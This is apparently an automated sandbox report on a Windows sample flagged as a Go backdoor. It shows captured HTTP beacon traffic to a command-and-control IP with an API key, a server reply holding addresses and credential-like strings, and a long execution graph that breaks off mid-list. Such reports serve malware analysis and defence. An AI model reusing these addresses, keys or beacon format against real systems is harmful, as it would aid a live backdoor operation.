                              8192.168.2.84971791.212.166.91801984C:\Users\user\Desktop\m0Yc9KltGw.exe
                              TimestampBytes transferredDirectionData
                              Nov 6, 2024 17:19:20.873711109 CET335OUTPOST / HTTP/1.1
                              Host: 91.212.166.91
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: f0N7GKZ3
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 04 27 19 07 0c 0d 21 01 2d 0d 1b 00 16 01 3a 10 5f 24 0f 0e 3d 52 2e 09 31 28 21 08 27 3f 01 07 3c 15 1a 06 1b 3a 3e 12 2b 26 0f 5d 0a 03 27 57 3b 02 1b 56 25 50 00 58 2d 31 22 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 21 39 3a 35 06 53 37 19 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 0a 26 3f 05 3e 0c 24 3d 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 0c 1e 3e 48 27 00 19 5c 08 51 5d 45 4f 4d 03 02 5c 45 59 4d 58 55 0b 50 01 0d 5c 50 08 51 53 09 0c 5f 0c 50 50 0c 5e 03 58 53 51 58 0f 52 0f 04 05 0e 08 54 4b 1a
                              Data Ascii: M*L\K'!-:_$=R.1(!'?<:>+&]'W;V%PX-1"EOM:DSE!9:5S7LJK9AUL&?>$=EOM9L\KW>H'\Q]EOM\EYMXUP\PQS_PP^XSQXRTK
                              Nov 6, 2024 17:19:22.175688028 CET556INHTTP/1.1 200 OK
                              Date: Wed, 06 Nov 2024 16:19:22 GMT
                              Content-Length: 438
                              Content-Type: text/plain; charset=utf-8
                              Data Raw: 31 38 35 2e 31 32 31 2e 32 33 33 2e 31 35 32 3b 32 35 31 33 39 3b 68 64 52 5a 74 64 61 61 74 68 4f 49 70 6c 35 42 3a 34 35 4d 2f 4e 48 58 2f 54 66 41 34 31 44 31 36 69 6b 51 2e 70 44 5a 38 77 68 69 2e 33 4d 51 32 4c 6d 65 33 50 67 4c 32 70 71 48 2e 4e 4a 50 31 53 58 6d 30 65 64 47 36 56 6d 59 2c 64 33 70 68 50 64 5a 74 45 75 51 74 4f 37 45 70 67 5a 43 3a 6b 6c 4a 2f 49 72 48 2f 4c 70 7a 34 48 32 65 36 38 38 36 2e 61 62 38 38 70 6a 35 2e 48 71 38 32 55 47 67 33 6e 79 78 36 50 6e 48 2e 6a 44 4e 36 4d 69 77 31 70 66 4b 2c 54 70 4f 68 50 37 57 74 34 30 71 74 44 51 58 70 59 39 74 3a 75 51 56 2f 5a 66 61 2f 57 57 31 39 47 66 57 33 69 31 6f 2e 68 42 7a 31 41 5a 75 38 72 54 6f 35 59 39 43 2e 53 51 58 31 45 46 53 35 63 63 77 39 4c 53 57 2e 54 71 59 32 7a 56 67 35 41 7a 6f 33 56 4d 42 2c 68 72 36 68 74 69 57 74 43 45 6c 74 69 57 78 70 54 52 79 3a 58 48 37 2f 64 42 76 2f 6e 72 42 39 74 50 35 31 4e 44 77 2e 4c 5a 52 32 67 68 46 31 50 34 77 32 66 31 6d 2e 59 32 32 31 63 53 77 36 47 6f 55 36 69 46 58 2e 65 79 47 [TRUNCATED]
                              Data Ascii: 185.121.233.152;25139;hdRZtdaathOIpl5B:45M/NHX/TfA41D16ikQ.pDZ8whi.3MQ2Lme3PgL2pqH.NJP1SXm0edG6VmY,d3phPdZtEuQtO7EpgZC:klJ/IrH/Lpz4H2e6886.ab88pj5.Hq82UGg3nyx6PnH.jDN6Miw1pfK,TpOhP7Wt40qtDQXpY9t:uQV/Zfa/WW19GfW3i1o.hBz1AZu8rTo5Y9C.SQX1EFS5ccw9LSW.TqY2zVg5Azo3VMB,hr6htiWtCEltiWxpTRy:XH7/dBv/nrB9tP51NDw.LZR2ghF1P4w2f1m.Y221cSw6GoU6iFX.eyG9ox81mgh,SVahcvhtg47tNrapIpR:NXT/smT/CZZ12V58bAu8aV7.ZsL1xwE3auE0DAs.Pi32BwO0BdI6HRE.IHp2EPL4Qzo3jQE
                              Nov 6, 2024 17:19:52.178417921 CET6OUTData Raw: 00
                              Data Ascii:
                              Nov 6, 2024 17:20:22.194598913 CET6OUTData Raw: 00
                              Data Ascii:


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              System Behavior

                              General

                              Target ID:0
                              Start time:11:18:41
                              Start date:06/11/2024
                              Path:C:\Users\user\Desktop\m0Yc9KltGw.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\m0Yc9KltGw.exe"
                              Imagebase:0x400000
                              File size:9'312'768 bytes
                              MD5 hash:63B7BB26A60FB9E73C0E1427A4FCFAF2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GOBackdoor, Description: Yara detected GO Backdoor, Source: 00000000.00000002.2733958560.000000000C008000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:21.1%
                                Dynamic/Decrypted Code Coverage:79.1%
                                Signature Coverage:42.6%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:268
                                execution_graph 107345 41ce25 107346 41ce2f 107345->107346 107349 41ce3e 107346->107349 107350 41ce5d 107349->107350 107353 41ce79 107350->107353 107355 41ceb3 107353->107355 107360 41cea2 VirtualProtect 107353->107360 107355->107360 107753 41d0c6 107355->107753 107356 41d1d1 107357 41d208 107358 41d2f0 107357->107358 108151 2927719 107357->108151 108181 296bf1d 107357->108181 108203 2942316 107357->108203 108218 2928b17 107357->108218 108238 2926fef 107357->108238 108268 2941f15 107357->108268 108286 29617e3 107357->108286 108292 2942bef 107357->108292 108296 2925fe3 107357->108296 108326 29423e7 107357->108326 108340 2922fe2 107357->108340 108344 29627e6 107357->108344 108348 29267f0 107357->108348 108378 29287fb 107357->108378 108400 29293cd 107357->108400 108420 29417f4 107357->108420 108438 29613c8 107357->108438 108446 2924fcd 107357->108446 108480 29423c8 107357->108480 108494 2927fcc 107357->108494 108524 2928bc6 107357->108524 108544 2928bcb 107357->108544 108564 296afd8 107357->108564 108570 2941fc4 107357->108570 108588 2940bd5 107357->108588 108614 2923bd1 107357->108614 108655 2923bad 107357->108655 108696 296dbd6 107357->108696 108712 2925ba9 107357->108712 108744 29623a8 107357->108744 108750 2962faf 107357->108750 108754 2928fa8 107357->108754 108779 29413a3 107357->108779 108801 29417ad 107357->108801 108819 29417a7 107357->108819 108837 2926ba5 107357->108837 108871 2941fb8 107357->108871 108889 29617bb 107357->108889 108895 29263ba 107357->108895 108925 29233bb 107357->108925 108966 2926fb4 107357->108966 108996 29417b2 107357->108996 109014 2922fb0 107357->109014 109018 296d3b2 107357->109018 109041 2922b8d 107357->109041 109045 29297b3 107357->109045 109057 2961f8f 107357->109057 109063 2927b8f 107357->109063 109093 2926787 107357->109093 109123 2922787 107357->109123 109127 2926f99 107357->109127 109157 2926b80 107357->109157 109191 2922b92 107357->109191 109195 2922b97 107357->109195 109199 2941a6d 107357->109199 109217 296de68 107357->109217 109229 2926e6a 107357->109229 109259 292726b 107357->109259 109289 2960a60 107357->109289 109299 2961261 107357->109299 109305 2961e67 107357->109305 109311 2941661 107357->109311 109329 292727d 107357->109329 109359 2922e63 107357->109359 109363 296127a 107357->109363 109369 2928a7c 107357->109369 109387 296167d 107357->109387 109393 2962e7a 107357->109393 109397 2962272 107357->109397 109403 2929277 107357->109403 109406 2922e73 107357->109406 109410 296ea75 107357->109410 109418 294164c 107357->109418 109437 2940a4e 107357->109437 109463 292865c 107357->109463 109485 2928241 107357->109485 109509 294265f 107357->109509 109521 2927e5f 107357->109521 109543 2929a5a 107357->109543 109549 2962a5c 107357->109549 109553 2941252 107357->109553 109571 2960a51 107357->109571 109581 2924650 107357->109581 109618 2927250 107357->109618 109648 2923e2c 107357->109648 109686 2962a29 107357->109686 109690 292962e 107357->109690 109702 292722c 107357->109702 109732 2926e26 107357->109732 109763 2928a2b 107357->109763 109783 2922e23 107357->109783 109787 2925a21 107357->109787 109817 296123b 107357->109817 109825 2925623 107357->109825 109855 292863f 107357->109855 109877 2923e3f 107357->109877 109914 2924e31 107357->109914 109948 2924e36 107357->109948 109982 294160a 107357->109982 110002 2961236 107357->110002 110010 2923a08 107357->110010 110051 2929a0f 107357->110051 110057 2941e04 107357->110057 110075 2924201 107357->110075 110112 2941a19 107357->110112 110130 294121a 107357->110130 110154 2927618 107357->110154 110184 294261f 107357->110184 110190 2942e10 107357->110190 110194 2962612 107357->110194 110206 2928a11 107357->110206 110226 2941e17 107357->110226 110244 296aaec 107357->110244 110251 2924e12 107357->110251 110285 2926ee1 107357->110285 110315 296e6e5 107357->110315 110323 29626fe 107357->110323 110337 29262f8 107357->110337 110367 296bef6 107357->110367 110389 2941efc 107357->110389 110407 29266ce 107357->110407 110437 2960ac9 107357->110437 110447 29266c7 107357->110447 110477 2961acf 107357->110477 110483 2941ac4 107357->110483 110501 296aec4 107357->110501 110508 296aeda 107357->110508 110514 29272dd 107357->110514 110544 29296d0 107357->110544 110556 2962ed5 107357->110556 110560 2926ea4 107357->110560 110590 2942ead 107357->110590 110594 2942aa4 107357->110594 110598 29262a6 107357->110598 110628 296eaba 107357->110628 110634 29632ba 107357->110634 110638 296aabd 107357->110638 110645 2926ebe 107357->110645 110675 29626b1 107357->110675 110681 2942ebe 107357->110681 110685 29296b1 107357->110685 110697 296a6b5 107357->110697 110701 2928289 107357->110701 110723 2942ab6 107357->110723 110727 296aa80 107357->110727 110734 292628b 107357->110734 110764 2941a9f 107357->110764 110782 2941e80 107357->110782 110800 2961e91 107357->110800 110806 2927a9a 107357->110806 110836 296a695 107357->110836 110847 2941290 107357->110847 110869 2926a92 107357->110869 110899 2927290 107357->110899 110929 2942f19 107357->110929 110933 2962f05 107357->110933 110937 2942c4f 107357->110937 110941 292316c 107357->110941 110945 296b16f 107357->110945 110951 2942d6d 107357->110951 110955 2925965 107357->110955 110985 2927d6a 107357->110985 111015 2924964 107357->111015 111052 2927565 107357->111052 111082 2924566 107357->111082 111119 2923967 107357->111119 111160 292917d 107357->111160 111183 2962579 107357->111183 111195 292717e 107357->111195 111225 292897c 107357->111225 111246 2940971 107357->111246 111272 294297e 107357->111272 111276 2925970 107357->111276 111306 2926977 107357->111306 111338 2927940 107357->111338 111372 2960976 107357->111372 111382 2925559 107357->111382 111412 2942959 107357->111412 111418 2953152 107357->111418 111422 2925d5b 107357->111422 111452 296b12f 107357->111452 111458 2928d57 107357->111458 111478 292712b 107357->111478 111508 292552b 107357->111508 111538 2962525 107357->111538 111550 292692a 107357->111550 111582 2953139 107357->111582 111586 2926d20 107357->111586 111620 2940d31 107357->111620 111646 2941931 107357->111646 111664 2925d0f 107357->111664 111694 2941536 107357->111694 111714 296150f 107357->111714 111720 2960d0c 107357->111720 111730 2962901 107357->111730 111734 2926d0a 107357->111734 111768 2928100 107357->111768 111796 296b100 107357->111796 111802 2928d02 107357->111802 111818 2923d03 107357->111818 111859 296191d 107357->111859 111865 2927d1d 107357->111865 111895 2927917 107357->111895 111925 296b111 107357->111925 111931 2941914 107357->111931 111949 2942917 107357->111949 111955 29271e1 107357->111955 111985 29269e9 107357->111985 112017 29255fe 107357->112017 112047 2962dfa 107357->112047 112051 29425f4 107357->112051 112064 29419f7 107357->112064 112082 29255cc 107357->112082 112112 29429ca 107357->112112 112116 29421c9 107357->112116 112138 29619cb 107357->112138 112144 29269c9 107357->112144 112174 29629cd 107357->112174 112178 2923dc4 107357->112178 112216 29291c4 107357->112216 112241 29291dc 107357->112241 112266 2922dc7 107357->112266 112270 29231d9 107357->112270 112274 29241dc 107357->112274 112311 29271d8 107357->112311 112341 2942dde 107357->112341 112345 29621d5 107357->112345 112351 2923dd7 107357->112351 112390 2924dd0 107357->112390 112424 29619d4 107357->112424 112430 29241aa 107357->112430 112467 29261a9 107357->112467 112497 29421a0 107357->112497 112515 29431a1 107357->112515 112519 2940da5 107357->112519 112544 29261a0 107357->112544 112574 29239b8 107357->112574 112615 2924db9 107357->112615 112649 29269b6 107357->112649 112679 29249bb 107357->112679 112716 29619b6 107357->112716 112722 29291b1 107357->112722 112747 2925db2 107357->112747 112777 2941db4 107357->112777 112795 2962589 107357->112795 112807 29265b2 107357->112807 112837 2960d88 107357->112837 112847 2925d8d 107357->112847 112877 2961d82 107357->112877 112883 296b18e 107357->112883 112887 2927d82 107357->112887 112917 2924583 107357->112917 112954 2941999 107357->112954 112972 2924182 107357->112972 113009 2929198 107357->113009 113032 292719f 107357->113032 113062 2924996 107357->113062 113099 2928998 107357->113099 113120 2960d96 107357->113120 113130 2962d95 107357->113130 113134 2922c68 107357->113134 113138 2942b0d 107357->113138 113141 2960b39 107357->113141 113151 2924868 107357->113151 113192 2929c66 107357->113192 113198 2928864 107357->113198 113220 292947c 107357->113220 113241 2923063 107357->113241 113245 296e471 107357->113245 113255 294247f 107357->113255 113267 296084b 107357->113267 113277 2928074 107357->113277 113307 2960c4c 107357->113307 113317 29424dc 107357->113317 113329 292344a 107357->113329 113370 2940c4d 107357->113370 113396 2962042 107357->113396 113402 2924045 107357->113402 113439 2923840 107357->113439 113480 2922c40 107357->113480 113484 292445d 107357->113484 113521 2941445 107357->113521 113543 296085f 107357->113543 113553 2961858 107357->113553 113559 296305e 107357->113559 113563 2942c5d 107357->113563 113567 2942850 107357->113567 113573 2925854 107357->113573 113603 2925c52 107357->113603 113633 2940850 107357->113633 113659 2925c27 107357->113659 113689 296d82a 107357->113689 113701 2962c27 107357->113701 113705 2929820 107357->113705 113714 294083b 107357->113714 113740 2963039 107357->113740 113744 296083c 107357->113744 113754 296203b 107357->113754 113760 2923831 107357->113760 113801 2942430 107357->113801 113813 296d401 107357->113813 113825 2925030 107357->113825 113859 2923007 107357->113859 113863 2961803 107357->113863 113869 2926c01 107357->113869 113903 2928806 107357->113903 113925 296dc07 107357->113925 113940 2963007 107357->113940 113944 2962c10 107357->113944 113948 292481e 107357->113948 113985 2925c16 107357->113985 114015 2924c17 107357->114015 114052 29248ee 107357->114052 114089 296dc17 107357->114089 114103 2962ce5 107357->114103 114107 29288e6 107357->114107 114129 29280e1 107357->114129 114157 2940ce7 107357->114157 114183 2929cf5 107357->114183 114187 29280f9 107357->114187 114215 29614f0 107357->114215 114223 29294f5 107357->114223 114237 2941cf5 107357->114237 114255 2940cf2 107357->114255 114281 29624cd 107357->114281 114287 2960b64 107357->114287 114297 29418c1 107357->114297 114315 29608ce 107357->114315 114325 29414c7 107357->114325 114347 2925cc6 107357->114347 114377 2962cd9 107357->114377 114381 29298c3 107357->114381 114393 296eb78 107357->114393 114397 29408dd 107357->114397 114423 29280d5 107357->114423 114453 29248d5 107357->114453 114490 29294d6 107357->114490 114510 29264d4 107357->114510 114540 29270d0 107357->114540 114570 29618d4 107357->114570 114576 29608a7 107357->114576 114586 29414ac 107357->114586 114608 29620b5 107357->114608 114614 29240bb 107357->114614 114651 2960888 107357->114651 114661 2926cb3 107357->114661 114695 2940887 107357->114695 114721 2940c8e 107357->114721 114747 2960c9b 107357->114747 114757 2941885 107357->114757 114775 2929c95 107357->114775 114781 2929c9a 107357->114781 114787 2953091 107357->114787 114792 2929494 107357->114792 114812 2941f68 107357->114812 114830 2942497 107357->114830 114842 2926768 107357->114842 114872 2941463 107357->114872 114894 294146a 107357->114894 114916 2940b62 107357->114916 114942 2942f70 107357->114942 114946 2923b30 107357->114946 114987 2942f4b 107357->114987 114991 2926372 107357->114991 115021 2926b4e 107357->115021 115055 2941749 107357->115055 115073 292875b 107357->115073 115095 296274d 107357->115095 115101 296c350 107357->115101 115123 2961751 107357->115123 115129 296bf29 107357->115129 115151 2924f52 107357->115151 115185 2926b26 107357->115185 115219 29288cd 107357->115219 115241 296276c 107357->115241 115247 2961b26 107357->115247 115253 2941f0e 107357->115253 115271 2927334 107357->115271 115301 292730f 107357->115301 115331 2928f33 107357->115331 115356 296bf0a 107357->115356 115378 2940b28 107357->115378 115404 2941f08 107357->115404 115422 2926306 107357->115422 115452 2940b00 107357->115452 115478 2961b01 107357->115478 115484 2928b1c 107357->115484 107361 41d700 107358->107361 107362 41e00d 107358->107362 107360->107356 107360->107357 115504 41d7c7 VirtualProtect VirtualProtect VirtualProtect VirtualProtect VirtualProtect 107361->115504 115505 41e08f VirtualProtect VirtualProtect VirtualProtect 107362->115505 107754 41d0d1 VirtualProtect 107753->107754 107756 41d1d1 107754->107756 107759 41d208 107754->107759 107756->107756 107763 41d2f0 107759->107763 107764 2926a92 25 API calls 107759->107764 107765 2927290 25 API calls 107759->107765 107766 296a695 5 API calls 107759->107766 107767 2941290 13 API calls 107759->107767 107768 2961e91 2 API calls 107759->107768 107769 2927a9a 25 API calls 107759->107769 107770 2941a9f 8 API calls 107759->107770 107771 2941e80 8 API calls 107759->107771 107772 296aa80 4 API calls 107759->107772 107773 292628b 25 API calls 107759->107773 107774 2928289 19 API calls 107759->107774 107775 2942ab6 VirtualProtect 107759->107775 107776 29296b1 6 API calls 107759->107776 107777 296a6b5 VirtualAlloc 107759->107777 107778 29626b1 2 API calls 107759->107778 107779 2942ebe VirtualProtect 107759->107779 107780 296aabd 4 API calls 107759->107780 107781 2926ebe 25 API calls 107759->107781 107782 296eaba 2 API calls 107759->107782 107783 29632ba VirtualProtect 107759->107783 107784 2942aa4 VirtualProtect 107759->107784 107785 29262a6 25 API calls 107759->107785 107786 2926ea4 25 API calls 107759->107786 107787 2942ead VirtualProtect 107759->107787 107788 29296d0 6 API calls 107759->107788 107789 2962ed5 VirtualProtect 107759->107789 107790 296aeda 2 API calls 107759->107790 107791 29272dd 25 API calls 107759->107791 107792 2941ac4 8 API calls 107759->107792 107793 296aec4 3 API calls 107759->107793 107794 29266c7 25 API calls 107759->107794 107795 2961acf 2 API calls 107759->107795 107796 29266ce 25 API calls 107759->107796 107797 2960ac9 4 API calls 107759->107797 107798 296bef6 13 API calls 107759->107798 107799 2941efc 8 API calls 107759->107799 107800 29626fe 6 API calls 107759->107800 107801 29262f8 25 API calls 107759->107801 107802 2926ee1 25 API calls 107759->107802 107803 296e6e5 4 API calls 107759->107803 107804 296aaec 4 API calls 107759->107804 107805 2924e12 27 API calls 107759->107805 107806 2928a11 18 API calls 107759->107806 107807 2941e17 8 API calls 107759->107807 107808 2942e10 VirtualProtect 107759->107808 107809 2962612 6 API calls 107759->107809 107810 2927618 25 API calls 107759->107810 107811 294261f 2 API calls 107759->107811 107812 2941a19 8 API calls 107759->107812 107813 294121a 14 API calls 107759->107813 107814 2941e04 8 API calls 107759->107814 107815 2924201 29 API calls 107759->107815 107816 2923a08 45 API calls 107759->107816 107817 2929a0f 3 API calls 107759->107817 107818 294160a 10 API calls 107759->107818 107819 2961236 3 API calls 107759->107819 107820 2924e31 27 API calls 107759->107820 107821 2924e36 27 API calls 107759->107821 107822 292863f 19 API calls 107759->107822 107823 2923e3f 29 API calls 107759->107823 107824 296123b 3 API calls 107759->107824 107825 2925623 25 API calls 107759->107825 107826 2922e23 VirtualProtect 107759->107826 107827 2925a21 25 API calls 107759->107827 107828 2926e26 27 API calls 107759->107828 107829 2928a2b 18 API calls 107759->107829 107830 292962e 6 API calls 107759->107830 107831 292722c 25 API calls 107759->107831 107832 2923e2c 33 API calls 107759->107832 107833 2962a29 VirtualProtect 107759->107833 107834 2924650 29 API calls 107759->107834 107835 2927250 25 API calls 107759->107835 107836 2941252 8 API calls 107759->107836 107837 2960a51 4 API calls 107759->107837 107838 2929a5a 3 API calls 107759->107838 107839 2962a5c VirtualProtect 107759->107839 107840 294265f 4 API calls 107759->107840 107841 2927e5f 19 API calls 107759->107841 107842 292865c 19 API calls 107759->107842 107843 2928241 21 API calls 107759->107843 107844 294164c 9 API calls 107759->107844 107845 2940a4e 15 API calls 107759->107845 107846 2922e73 VirtualProtect 107759->107846 107847 296ea75 3 API calls 107759->107847 107848 2962272 2 API calls 107759->107848 107849 2929277 VirtualFree 107759->107849 107850 296167d 2 API calls 107759->107850 107851 2962e7a VirtualProtect 107759->107851 107852 296127a 2 API calls 107759->107852 107853 2928a7c 17 API calls 107759->107853 107854 292727d 25 API calls 107759->107854 107855 2922e63 VirtualProtect 107759->107855 107856 2961e67 2 API calls 107759->107856 107857 2941661 8 API calls 107759->107857 107858 2960a60 4 API calls 107759->107858 107859 2961261 2 API calls 107759->107859 107860 2926e6a 25 API calls 107759->107860 107861 292726b 25 API calls 107759->107861 107862 2941a6d 8 API calls 107759->107862 107863 296de68 6 API calls 107759->107863 107864 2922b92 VirtualProtect 107759->107864 107865 2922b97 VirtualProtect 107759->107865 107866 2926f99 25 API calls 107759->107866 107867 2926b80 29 API calls 107759->107867 107868 2926787 25 API calls 107759->107868 107869 2922787 VirtualProtect 107759->107869 107870 2961f8f 2 API calls 107759->107870 107871 2927b8f 25 API calls 107759->107871 107872 2922b8d VirtualProtect 107759->107872 107873 29297b3 6 API calls 107759->107873 107874 2922fb0 VirtualProtect 107759->107874 107875 296d3b2 12 API calls 107759->107875 107876 2926fb4 25 API calls 107759->107876 107877 29417b2 8 API calls 107759->107877 107878 29263ba 25 API calls 107759->107878 107879 29233bb 45 API calls 107759->107879 107880 2941fb8 8 API calls 107759->107880 107881 29617bb 2 API calls 107759->107881 107882 29417a7 8 API calls 107759->107882 107883 2926ba5 29 API calls 107759->107883 107884 29413a3 13 API calls 107759->107884 107885 29417ad 8 API calls 107759->107885 107886 2962faf VirtualProtect 107759->107886 107887 2928fa8 12 API calls 107759->107887 107888 2925ba9 27 API calls 107759->107888 107889 29623a8 2 API calls 107759->107889 107890 2923bad 45 API calls 107759->107890 107891 296dbd6 9 API calls 107759->107891 107892 2940bd5 15 API calls 107759->107892 107893 2923bd1 45 API calls 107759->107893 107894 296afd8 2 API calls 107759->107894 107895 2941fc4 8 API calls 107759->107895 107896 2928bc6 15 API calls 107759->107896 107897 2928bcb 16 API calls 107759->107897 107898 29423c8 6 API calls 107759->107898 107899 2927fcc 25 API calls 107759->107899 107900 29613c8 3 API calls 107759->107900 107901 2924fcd 27 API calls 107759->107901 107902 29293cd 10 API calls 107759->107902 107903 29417f4 8 API calls 107759->107903 107904 29267f0 25 API calls 107759->107904 107905 29287fb 19 API calls 107759->107905 107906 2922fe2 VirtualProtect 107759->107906 107907 29627e6 VirtualProtect 107759->107907 107908 2925fe3 25 API calls 107759->107908 107909 29423e7 6 API calls 107759->107909 107910 29617e3 2 API calls 107759->107910 107911 2942bef VirtualProtect 107759->107911 107912 2926fef 25 API calls 107759->107912 107913 2941f15 8 API calls 107759->107913 107914 2942316 7 API calls 107759->107914 107915 2928b17 16 API calls 107759->107915 107916 2927719 25 API calls 107759->107916 107917 296bf1d 13 API calls 107759->107917 107918 2942f19 VirtualProtect 107759->107918 107919 2928b1c 16 API calls 107759->107919 107920 2962f05 VirtualProtect 107759->107920 107921 2926306 25 API calls 107759->107921 107922 2940b00 15 API calls 107759->107922 107923 2961b01 2 API calls 107759->107923 107924 2942b0d VirtualProtect 107759->107924 107925 2941f0e 8 API calls 107759->107925 107926 296bf0a 13 API calls 107759->107926 107927 2941f08 8 API calls 107759->107927 107928 292730f 25 API calls 107759->107928 107929 2928f33 12 API calls 107759->107929 107930 2923b30 45 API calls 107759->107930 107931 2927334 25 API calls 107759->107931 107932 2960b39 4 API calls 107759->107932 107933 2961b26 2 API calls 107759->107933 107934 2926b26 29 API calls 107759->107934 107935 2940b28 15 API calls 107759->107935 107936 296bf29 13 API calls 107759->107936 107937 2924f52 27 API calls 107759->107937 107938 296c350 13 API calls 107759->107938 107939 2961751 2 API calls 107759->107939 107940 292875b 19 API calls 107759->107940 107941 296274d 2 API calls 107759->107941 107942 2926b4e 29 API calls 107759->107942 107943 2941749 8 API calls 107759->107943 107944 2942f4b VirtualProtect 107759->107944 107945 2926372 25 API calls 107759->107945 107946 2942f70 VirtualProtect 107759->107946 107947 296eb78 VirtualAlloc 107759->107947 107948 2960b64 4 API calls 107759->107948 107949 2940b62 15 API calls 107759->107949 107950 2926768 25 API calls 107759->107950 107951 296276c 2 API calls 107759->107951 107952 2941f68 8 API calls 107759->107952 107953 2942497 5 API calls 107759->107953 107954 2953091 2 API calls 107759->107954 107955 2929494 9 API calls 107759->107955 107956 2929c95 2 API calls 107759->107956 107957 2929c9a 2 API calls 107759->107957 107958 2960c9b 4 API calls 107759->107958 107959 2941885 8 API calls 107759->107959 107960 2940887 15 API calls 107759->107960 107961 2940c8e 15 API calls 107759->107961 107962 2960888 4 API calls 107759->107962 107963 2926cb3 29 API calls 107759->107963 107964 29620b5 2 API calls 107759->107964 107965 29240bb 29 API calls 107759->107965 107966 29608a7 4 API calls 107759->107966 107967 29414ac 13 API calls 107759->107967 107968 29270d0 25 API calls 107759->107968 107969 29618d4 2 API calls 107759->107969 107970 29294d6 10 API calls 107759->107970 107971 29264d4 25 API calls 107759->107971 107972 29280d5 25 API calls 107759->107972 107973 29248d5 29 API calls 107759->107973 107974 29424dc 4 API calls 107759->107974 107975 29408dd 15 API calls 107759->107975 107976 2962cd9 VirtualProtect 107759->107976 107977 29298c3 5 API calls 107759->107977 107978 29414c7 12 API calls 107759->107978 107979 2925cc6 25 API calls 107759->107979 107980 29418c1 8 API calls 107759->107980 107981 29608ce 4 API calls 107759->107981 107982 29624cd 2 API calls 107759->107982 107983 29288cd 19 API calls 107759->107983 107984 2941cf5 8 API calls 107759->107984 107985 2940cf2 15 API calls 107759->107985 107986 29614f0 3 API calls 107759->107986 107987 29294f5 7 API calls 107759->107987 107988 2929cf5 VirtualFree 107759->107988 107989 29280f9 23 API calls 107759->107989 107990 29280e1 23 API calls 107759->107990 107991 2940ce7 15 API calls 107759->107991 107992 2962ce5 VirtualProtect 107759->107992 107993 29288e6 19 API calls 107759->107993 107994 29248ee 29 API calls 107759->107994 107995 296dc17 7 API calls 107759->107995 107996 2925c16 25 API calls 107759->107996 107997 2924c17 29 API calls 107759->107997 107998 2962c10 VirtualProtect 107759->107998 107999 292481e 29 API calls 107759->107999 108000 296dc07 8 API calls 107759->108000 108001 2963007 VirtualProtect 107759->108001 108002 2926c01 29 API calls 107759->108002 108003 2928806 19 API calls 107759->108003 108004 2923007 VirtualProtect 107759->108004 108005 2961803 2 API calls 107759->108005 108006 296d401 6 API calls 107759->108006 108007 2925030 27 API calls 107759->108007 108008 2923831 45 API calls 107759->108008 108009 2942430 5 API calls 107759->108009 108010 296083c 4 API calls 107759->108010 108011 296203b 2 API calls 107759->108011 108012 294083b 15 API calls 107759->108012 108013 2963039 VirtualProtect 107759->108013 108014 2962c27 VirtualProtect 107759->108014 108015 2929820 5 API calls 107759->108015 108016 2925c27 25 API calls 107759->108016 108017 296d82a 6 API calls 107759->108017 108018 2925c52 25 API calls 107759->108018 108019 2940850 15 API calls 107759->108019 108020 2942850 2 API calls 107759->108020 108021 2925854 25 API calls 107759->108021 108022 296305e VirtualProtect 107759->108022 108023 2942c5d VirtualProtect 107759->108023 108024 296085f 4 API calls 107759->108024 108025 2961858 2 API calls 107759->108025 108026 292445d 29 API calls 107759->108026 108027 2941445 13 API calls 107759->108027 108028 2923840 45 API calls 107759->108028 108029 2922c40 VirtualProtect 107759->108029 108030 2962042 2 API calls 107759->108030 108031 2924045 29 API calls 107759->108031 108032 292344a 45 API calls 107759->108032 108033 2940c4d 15 API calls 107759->108033 108034 2960c4c 4 API calls 107759->108034 108035 2942c4f VirtualProtect 107759->108035 108036 296084b 4 API calls 107759->108036 108037 2928074 25 API calls 107759->108037 108038 296e471 5 API calls 107759->108038 108039 294247f 5 API calls 107759->108039 108040 292947c 9 API calls 107759->108040 108041 2923063 VirtualProtect 107759->108041 108042 2929c66 3 API calls 107759->108042 108043 2928864 19 API calls 107759->108043 108044 2941463 13 API calls 107759->108044 108045 2924868 33 API calls 107759->108045 108046 2922c68 VirtualProtect 107759->108046 108047 294146a 13 API calls 107759->108047 108048 2960d96 4 API calls 107759->108048 108049 2962d95 VirtualProtect 107759->108049 108050 2924996 29 API calls 107759->108050 108051 2928998 19 API calls 107759->108051 108052 2929198 11 API calls 107759->108052 108053 292719f 25 API calls 107759->108053 108054 2941999 8 API calls 107759->108054 108055 2924182 29 API calls 107759->108055 108056 2927d82 25 API calls 107759->108056 108057 2924583 29 API calls 107759->108057 108058 2961d82 2 API calls 107759->108058 108059 296b18e VirtualAlloc 107759->108059 108060 2960d88 4 API calls 107759->108060 108061 2925d8d 25 API calls 107759->108061 108062 2962589 6 API calls 107759->108062 108063 29265b2 25 API calls 107759->108063 108064 2925db2 25 API calls 107759->108064 108065 2941db4 8 API calls 107759->108065 108066 29619b6 2 API calls 107759->108066 108067 29291b1 12 API calls 107759->108067 108068 29269b6 25 API calls 107759->108068 108069 29249bb 29 API calls 107759->108069 108070 29239b8 45 API calls 107759->108070 108071 2924db9 27 API calls 107759->108071 108072 2940da5 15 API calls 107759->108072 108073 29261a0 25 API calls 107759->108073 108074 29421a0 8 API calls 107759->108074 108075 29431a1 VirtualProtect 107759->108075 108076 29241aa 29 API calls 107759->108076 108077 29261a9 25 API calls 107759->108077 108078 2924dd0 27 API calls 107759->108078 108079 29619d4 2 API calls 107759->108079 108080 29621d5 2 API calls 107759->108080 108081 2923dd7 37 API calls 107759->108081 108082 29271d8 25 API calls 107759->108082 108083 2942dde VirtualProtect 107759->108083 108084 29231d9 VirtualProtect 107759->108084 108085 29241dc 29 API calls 107759->108085 108086 29291dc 11 API calls 107759->108086 108087 2922dc7 VirtualProtect 107759->108087 108088 2923dc4 41 API calls 